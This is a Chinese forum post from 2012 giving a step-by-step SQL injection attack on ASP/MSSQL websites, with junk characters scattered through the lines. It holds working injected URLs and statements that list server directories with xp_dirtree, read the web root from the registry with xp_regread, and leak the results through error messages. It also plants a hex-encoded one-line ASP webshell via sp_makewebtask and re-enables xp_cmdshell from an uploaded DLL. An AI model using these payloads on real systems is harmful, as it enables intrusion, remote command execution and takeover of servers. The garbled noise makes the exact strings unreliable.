好,我们exec master..xp_dirtree'd:/test'
4 B4 S: r! P) k$ Z* n假设我们在test里有两个文件夹test1和test2在test1里又有test33 h& _. B( s& g+ j$ R' r3 ?
结果显示
+ t R2 L" N, h; c0 H# U& g
8 H0 L; M* H% N, O+ wsubdirectory depth
4 W3 Z9 [/ k0 k# b1 ~7 r! v* r) l" d4 jtest1 11 E: ^+ _/ Y+ a. Z
test3 2$ [2 v$ _0 O2 B$ N7 @
test2 1
& o$ W, F$ r& C- @- I9 Z2 `
7 N4 I# N @3 \1 F0 @0 y4 j8 `4 ^哈哈发现没有那个depth就是目录的级数
! ~* p% @+ L ]' _8 [ok了,知道怎么办了吧
% j& {8 b3 _$ N0 i, n3 [' M4 Y) \2 _
3 R2 v1 }% ]' z8 s0 H Lhttp://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)-- # Q3 [- G# J! e( j4 X
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- 0 \. t2 S- ?& {7 b) q
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
- s( O/ P# P0 E( M" v% Z
1 L- n0 P8 T" _只要加上id=1,就是第一级目录 。) U! p2 @, X3 ^& R7 \
6 {; O9 i9 o0 s/ I8 n( u" y+ b- s1 f( K
通过注册表读网站路径:
+ |# e$ ^6 {9 ^7 H0 K, v* U
( }8 W. f/ F5 a4 h- k: s. e1.;create table [dbo].[cyfd] ([gyfd][char](255));5 t$ @. x5 I u+ B
: f* B# h( N" M2 k! Y2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--9 e( c* k% P8 T) s% I, R1 p
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
$ V# @1 e+ o/ N6 Z5 a9 i
- v$ h" R/ R: i$ m3.and 1=(select count(*) from 临时表 where 临时字段名>1)
# T/ \3 l I& k5 s' a V# f* Fand 1=(select count(*) from cyfd where gyfd > 1)
; g$ g' i i3 I& c这样IE报错,就把刚才插进去的Web路径的值报出来了
% z6 L% Z2 G* {5 \. |1 f$ H6 d& X1 I: g9 ?8 \8 p( O
4.drop table cyfd;-- 删除临时表
. D( V- f2 H1 m, Q$ \ ^5 V: `$ B$ o: N2 m9 v1 k' \1 r& T
获得webshell方法:0 V. W3 j' n8 u: D
1.create table cmd (a image)-- \**cmd是创建的临时表
5 q# O) `8 I! Q) p7 _) g& V2 m* t! m' ?* `+ W* R" n9 S+ i
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话( O8 o o R2 F+ U) c
+ q. O, x- o$ S
1 l# ^3 C3 T* S# X3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd') M3 Y, ]( ?( W9 {" c
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'7 F4 V" {+ m4 }7 L& e; A
% _5 ~8 W! r- f; _; U6 e+ t' E ]4.drop table cmd;-- 删除cmd临时表! F2 i* J! q) c; i. d5 i
7 E8 k+ H5 R( ]+ I; {7 p y恢复xp_cmdshell方法之一:
" ^! r6 \; j7 K我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
9 ?2 v0 q0 v( Z3 o3 {$ ~% F: nhttp://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'1 ~$ v7 c2 t- I$ ]
恢复,支持绝对路径的恢复哦。:)* V% H4 c0 m& g T" s
|
发表于 2012-9-13 17:20:30
收藏
支持
反对